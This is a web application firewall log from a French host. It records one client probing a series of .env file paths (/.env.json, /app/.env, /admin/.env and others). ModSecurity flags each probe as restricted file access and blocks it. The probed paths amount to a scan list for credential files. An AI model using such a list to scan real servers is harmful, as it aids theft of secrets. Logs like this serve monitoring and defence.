[Mon May 11 16:41:31.896589 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.json"] [unique_id "agHqm0WKUxpmnkK7zHyCHgAAAQo"]
[Mon May 11 16:41:31.897069 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.json"] [unique_id "agHqm0WKUxpmnkK7zHyCHgAAAQo"]
[Mon May 11 16:41:31.897294 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.json"] [unique_id "agHqm0WKUxpmnkK7zHyCHgAAAQo"]
[Mon May 11 16:41:32.073061 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yaml"] [unique_id "agHqnEWKUxpmnkK7zHyCIAAAAQo"]
[Mon May 11 16:41:32.073551 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yaml"] [unique_id "agHqnEWKUxpmnkK7zHyCIAAAAQo"]
[Mon May 11 16:41:32.073775 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yaml"] [unique_id "agHqnEWKUxpmnkK7zHyCIAAAAQo"]
[Mon May 11 16:41:32.238059 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yml"] [unique_id "agHqnEWKUxpmnkK7zHyCIgAAAQo"]
[Mon May 11 16:41:32.238610 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yml"] [unique_id "agHqnEWKUxpmnkK7zHyCIgAAAQo"]
[Mon May 11 16:41:32.238871 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.yml"] [unique_id "agHqnEWKUxpmnkK7zHyCIgAAAQo"]
[Mon May 11 16:41:32.407778 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHqnEWKUxpmnkK7zHyCIwAAAQo"]
[Mon May 11 16:41:32.408255 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHqnEWKUxpmnkK7zHyCIwAAAQo"]
[Mon May 11 16:41:32.408473 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHqnEWKUxpmnkK7zHyCIwAAAQo"]
[Mon May 11 16:41:32.759212 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agHqnEWKUxpmnkK7zHyCJAAAAQo"]
[Mon May 11 16:41:32.759689 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agHqnEWKUxpmnkK7zHyCJAAAAQo"]
[Mon May 11 16:41:32.759911 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agHqnEWKUxpmnkK7zHyCJAAAAQo"]
[Mon May 11 16:41:32.928167 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHqnEWKUxpmnkK7zHyCJQAAAQo"]
[Mon May 11 16:41:32.928646 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHqnEWKUxpmnkK7zHyCJQAAAQo"]
[Mon May 11 16:41:32.928883 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHqnEWKUxpmnkK7zHyCJQAAAQo"]
[Mon May 11 16:41:33.094384 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKAAAAQo"]
[Mon May 11 16:41:33.094865 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKAAAAQo"]
[Mon May 11 16:41:33.095077 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKAAAAQo"]
[Mon May 11 16:41:33.271444 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/site/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKQAAAQo"]
[Mon May 11 16:41:33.271931 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/site/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKQAAAQo"]
[Mon May 11 16:41:33.272182 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/site/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKQAAAQo"]
[Mon May 11 16:41:33.439084 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKgAAAQo"]
[Mon May 11 16:41:33.439704 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKgAAAQo"]
[Mon May 11 16:41:33.440038 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKgAAAQo"]
[Mon May 11 16:41:33.966735 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKwAAAQo"]
[Mon May 11 16:41:33.967244 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKwAAAQo"]
[Mon May 11 16:41:33.967472 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agHqnUWKUxpmnkK7zHyCKwAAAQo"]
[Mon May 11 16:41:34.132069 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCLAAAAQo"]
[Mon May 11 16:41:34.132568 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCLAAAAQo"]
[Mon May 11 16:41:34.132816 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCLAAAAQo"]
[Mon May 11 16:41:34.300636 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCLgAAAQo"]
[Mon May 11 16:41:34.301112 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCLgAAAQo"]
[Mon May 11 16:41:34.301341 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/server/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCLgAAAQo"]
[Mon May 11 16:41:34.471206 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCLwAAAQo"]
[Mon May 11 16:41:34.471693 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCLwAAAQo"]
[Mon May 11 16:41:34.471925 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/frontend/.env"] [unique_id "agHqnkWKUxpmnkK7zHyCLwAAAQo"]
